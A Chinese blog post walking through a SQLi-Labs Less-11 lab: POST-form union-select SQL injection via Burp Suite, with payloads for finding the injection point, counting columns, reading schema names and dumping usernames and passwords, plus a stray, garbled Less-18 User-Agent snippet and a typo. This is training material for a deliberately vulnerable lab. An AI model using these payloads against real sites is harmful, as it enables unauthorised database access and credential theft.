SQL注入--基于联合查询的POST注入

最新推荐文章于 2023-06-28 07:54:17 发布
最新推荐文章于 2023-06-28 07:54:17 发布
阅读量318 收藏
点赞数
文章标签: sql 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/omh164052427/article/details/123076010
版权

实验目的:

理解数字型GET注入的原理和特点,掌握利用联合查询(union select)的方法实现SQL注入的基本流程

实验原理

POST注入,其注入点存在于POST表单中的参数处。攻击者可以通过代理抓包
工具(如Burpsuite)拦截并修改POST表单中的参数,利用union select命令进
行注入,暴露数据库中存储的信息。

实验步骤

本实验的目标是:以SQLi-Labs网站的Less-11为入口,利用联合查询(union select)的方式实施SQL注入,获取SQLi-Labs网站的登录用户名和密码。

1.访问SQLi-Labs网站

 

2.利用Burpsuite工具进行抓包

(1)启动Burpsuite

(2)设置Burpsuite的代理服务端口

在Burpsuite软件界面上选择选项卡“Proxy"->”Options”,在Proxy Listeners模块下,将Burpsuite的代理服务端口设置为8080(此为Burpsuite默认的服务端
口)。

 

(3)开启Burpsuite的代理拦截功能

在Burpsuite软件界面上选择卡“Proxy"->”Intercept”,将拦截开关按钮的状态设置为”Intercept is on”

 

(4)设置Firefox代理

回到FireFox浏览器界面,鼠标右键单击浏览器地址栏右方的FoxyProxy插件图标按钮,在弹出的菜单中选择”为全部URLs启用代理服务器127.0.0.1:8080”:

 

(5)利用Burpsuite工具拦截HTTP请求包

在FireFox浏览器访问的Less-11登录验证界面,输入用户名admin、

密码任意(本例中为1),然后点击Submit按钮,

 

(6)将Burpsuite工具拦截到的HTTP请求包发送至Repeater模块。

选中拦截到的HTTP请求包全部内容,单击鼠标右键,在弹出的菜单中选择"Send to Repeater",将其发送给Burpsuite的Repeater模块。

 

寻找注入点

在左边最后一行加入后的样子uname=admin’&passwd=1&submit=submit然后点击左上角send报错

 

改成这样uname=admin’#&passwd=1&submit=submit

不报错 说明存在字符型注入点

 

改成这样 uname=admin'order by 1#&passwd=1&submit=Submit

查询字段数 1不报错

 uname=admin'order by 2#&passwd=1&submit=Submit 2也不报错

 

uname=admin'order by 3#&passwd=1&submit=Submit  3报错了 说明只有两个字段

 

uname=admin'and 1=2 union select 1,2#&passwd=1&submit=Submit 判断回显


 

uname=admin'and 1=2 union select 1,database()#&passwd=1&submit=Submit获取数据库名


 

uname=admin'and 1=2 union select 1,group_concat(table_namt) from information_schema.tables where

table_schema='security'#&passwd=1&submit=Submit

获取表名

 

由此可以判断,目标网站在POST参数处存在字符型注入点。
注如果在服务器端(靶机)上查看Less-18的 php代码,会发现其中存在这样一段代码:
$insert="INSERT INTO `security'. 'uagents'( uagent', ' ip_address', 'username')VALUES ( '$uagent' ,'$IP', $uname)";
这也是一种基于Insert的注入场景。
4.获取网站当前所在数据库的库名
使用以下 payload获取网站当前所在数据库的库名:
User-Agent:Mozil1a/5.0.... ..Firefox/46.0' andextractvalue(1,concat( '~' ,database())),",')#显示结果为security.
 

uname=adminid' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'#&passwd=1&submit=Submit

获取users全部字段

 

uname=adminid' and 1=2 union select 1,concat_ws(',',id,username,password) from

security.users limit 0,1#&passwd=1&submit=Submit

通过更改limit M,N逐条获取所有值

 

 

omh164052427
关注
SQL 注入-基于联合查询的字符型GET注入
xdjxi的博客
02-16 677
实验原理 字符型GET注入,其注入点存在于URL中的GET参数处; 攻击者可以通过构造恶意的GET输入参数,利用union select 命令进行注入,暴露数据库中存储的信息。 实验步骤 1 访问SQLI-Labs网站 http://(加靶机IP)/sqli-labs/Less-1/ 登录后,根据网页提示,定一个GET参数 http://(靶机ip)/sqli - labs / Less/?id=1 2 寻找注入点 用以下三条payload寻找注入点及判断注入点的类型; http:/
SQL注入基于联合查询post注入
qq_64332865的博客
02-17 142
访问SQLi-Labs网站 在攻击机 Pentest-Atk 打开FireFox浏览器,并访问靶机A-SQLi-Labs 上的SQLi-Labs网站Less-11。访问的URL为http: //[靶机IP]/sqli-labs/ Less-11/ 利用Burpsuite 工具抓包 启动 Burpsuite在攻击机 Pentest-Atk的桌面文件夹Burp中,鼠标左键双击BURP.cmd程序,启动Burpsuite。 将 Burpsuite工具拦截到的HTTP请求包发送至 R..
SQL注入——基于联合查询POST注入
qq_52072846的博客
02-18 1196
实验目的: 理解数字型GET注入的原理和特点,掌握利用联合查询(union select)的方法实现SQL注入的基本流程 实验原理 POST注入,其注入点存在于POST表单中的参数处。攻击者可以通过代理抓包 工具(如Burpsuite)拦截修改POST表单中的参数,利用union select命令进 行注入,暴露数据库中存储的信息。 实验步骤 本实验的目标是:以SQLi-Labs网站的Less-11为入口,利用联合查询(union select)的方式实施SQL注入,获取SQLi-Labs.
基于联合查询POST注入
m0_64338211的博客
02-16 3224
1.访问SQLi-Labs网站 在攻击机 Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs 上的 SQLi-Labs 网站Less-11。访问的URL为: http://[靶机IP]/sqli-labs/Less-11/ 2.利用Burpsuite工具抓包 (1)启动Burpsuite (2)设置Burpsuite的代理服务端口 在Burpsuite 软件界面上选择选项卡"Proxy"->"Options",在 Proxy Listeners模
基于联合查询Post注入
supermeatboy223的博客
02-16 1126
1.访问sqli-labs 选择关卡11 2.利用burpsuit抓包 设置好代理 账号输入 admin 密码 随意输入 点击登录 然后可以在bp中看到http请求包。 将bp抓到的包发送到Repeater模块 选中包中全部内容右键 点击send to repeater 在repeater下的request栏中设置注入的payload 完成后send 3.寻找注入点 在Post表单处,分别使用一下两条 payload寻找注入点以及判断注入点类型。 uname=admin'&..
SQL注入-概述-ppt.pptx
10-27
SQL注入是一种常见的网络安全威胁,主要针对使用SQL(结构化查询语言)进行数据存储和检索的Web应用程序。这种攻击方式利用了程序设计中的漏洞,使得恶意用户能够通过输入特定的SQL代码,来操纵数据库,获取未经授权...
SQL注入--POST注入
weixin_52151447的博客
11-19 3709
post注入与get注入区别在于POST注入在传参时不会将
第十一节 HTTP头中的SQL注入-01
09-15
这条命令会检测目标URL中所有POST表单的SQL注入漏洞。 - **指定参数探测SQL注入**:`sqlmap -u http://xxx.xxx.com/Login.asp --data "n=1&p=1"` 此命令针对特定的POST参数`n`和`p`进行SQL注入测试。 - **指定...
封神台SQL注入-POST注入
qq_40941912的博客
08-24 858
一、原理 判断注入点 判断当前页面字段总数 判断显示位 查当前数据库 查表名 查列名 查字段内容 POST注入就是使用POST进行传参的注入,本质上和GET类型的没什么区别 最经典的POST注入莫过于万能密码:'or 1=1# Mysql在5.0以上版本加入了 information_schema 这个系统自带库 其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等 information_schema.tables 存放表名和库名的对应 inf
SQL注入-产生位置+post注入+sqlmap
xiaoheizi的博客
06-28 403
—url没有参数并不代表没有注入,有时会在数据包中,http数据包中每个部分只要可以被接收,都可能产生漏洞。还有一种方式,不用保存数据包,可以直接扫描,就是使用。信息进行对比,涉及到数据库查询操作。信息整理保存,用户访问后数据库会获取用户的。网站根据用户的访问设备给予显示页面。会写到数据库,如果能自定义。测试显错位,结果直接爆出了。,然后将数据包中的两个。参数传递位置:可以在。测试出字段数后,输入。抓取登录数据包,右键。
SQL注入—基于联合查询POST注入
Snowflake1997的博客
02-17 388
访问SQLi-Labs网站 在攻击机Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs上的SQLi-Labs网站Less-11。访问的URL为: http://[靶机IP]/sqli-labs/Less-11/ 利用Burpsuite工具抓包 启动Burpsuite 在攻击机Pentest-Atk的桌面文件夹Burp中,打开Burpsuite程序 设置Burpsuite的代理服务端口 在Burpsuite软件界面上选择选项卡“Proxy”->”Opt
基于联合查询注入
WYJ____的博客
07-26 538
1.判断是否存在注入与求闭合字符(参考求闭合字符) 2.求列数 3.求显示位 4.求数据库 5.求表名 6.求列名 7.求字段内容  
SQL注入-基于联合查询的数字型GET注入
weixin_46831054的博客
02-16 3670
实验原理 数字型GET注入,其注入点存在于URL中的参数处。 攻击者可以通过构造恶意的get输入参数,利用union select命令进行注入,暴露数据库中存储的信息。 实验一 步骤: 1.访问靶机网站:http://127.0.0.1:456/Less-2/ 登录后,根据网页,给出GET参数 ?id=1 显示出用户名:Dumb,密码:Dumb 注:该实验利用Firefox的插件:Hackbar。没有该插件可到搜索框里输入payload参数。 2.寻找注入点 http://127.0.0.1:456/L
SQL注入联合查询注入
qq_45691294的博客
07-11 7915
MySQL中的联合查询 联合查询是可合并多个相似的选择查询的结果集。等同于将一个表追加到另一个表,从而实现将两个表的查询组合在一起,使用为此为UNINO或UNION ALL 联合查询:将多个查询的结果合并到一起(纵向合并):字段数不变,多个查询的记录数合并 基本语法: select 语句 union[union选项] select 语句; 联合查询注入的条件 联合查询注入是MySQL注入中的一种方式,在SQL注入中说了注入漏洞存在的相关条件,而联合查询注入这种方法需要满足查询的信息在前端有回显,回显数据的
mysql post 注入工具类_POST注入-双注入
weixin_34847560的博客
01-27 228
Less-111.首先随便写一点 然后直接抓包可以看见报错了这个时候我们加个单引号,然后分析后台报错得语句可以看见我们只看见了passwd得语法问题 没有看见uname得报错 我们初衷就是要加单引号,通过报错看看uname得语法所以加一个双引号看看这个时候后台报错就出来了这个时候想办法让他不报错直接admin‘# 闭合单引号可以看见不报错了然后用order by测试列数(用二分法)最后才测到是2...
注入SQL注入1
bwxzdjn的博客
03-18 1233
用实验案例的形式记录SQL注入按照注入点类型分类的三大基础注入形式:数字型注入、字符型注入和搜索型注入,采用手工注入的方法了解SQL注入的基本原理
sql注入-pikachu靶场
最新发布
10-13
SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过构造恶意的SQL语句来获取或篡改数据库中的数据。在Pikachu靶场中,可以通过注入恶意的SQL语句来获取管理员账户的密码。具体步骤如下: 1. 在登录页面输入用户名...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值